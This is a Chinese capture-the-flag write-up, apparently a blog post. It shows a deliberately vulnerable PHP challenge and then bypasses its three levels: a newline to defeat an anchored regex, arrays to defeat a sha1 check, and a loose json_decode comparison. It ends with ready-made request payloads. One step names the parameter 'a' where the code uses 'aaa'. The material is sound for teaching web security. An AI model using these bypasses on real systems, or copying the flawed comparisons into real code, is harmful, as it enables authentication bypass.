题目
<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){
$aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);
if(preg_match('/pass_the_level_1#/', $aaa)){
echo "here is level 2";
if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
if ($_POST['admin'] == $_POST['root_pwd'])
echo '<p>The level 2 can not pass!</p>';
// START FORM PROCESSING
else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
echo "here is level 3,do you kown how to overcome it?";
if (isset($_POST['level_3'])) {
$level_3 = json_decode($_POST['level_3']);
if ($level_3->result == $result) {
echo "success:".$flag;
}
else {
echo "you never beat me!";
}
}
else{
echo "out";
}
}
else{
die("no");
}
// perform validations on the form data
}
else{
echo '<p>out!</p>';
}
}
else{
echo 'nonono!';
}
echo '<hr>';
}
?>
思路
-
第一关 存在
^和$,匹配了开始和结尾位置,只能匹配一行的数据,所以使用换行符绕过:
?a=%0apass_the_level_1%23
此处的#号要转换成url编码
-
第二关 sha1()函数弱比较,使用数组绕过
admin[]=1&root_pwd[]=2
-
第三关 json_decode()函数弱比较,给result传入数字0,当我们传入json字符时,它会转化为同一类型进行比较,这里字符被转为0,我们传入的参数为0。
level_3={"result":0}
EXP
?aaa=%0apass_the_level_1%23
POST传入:
admin[]=1&root_pwd[]=2&level_3={"result":0}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
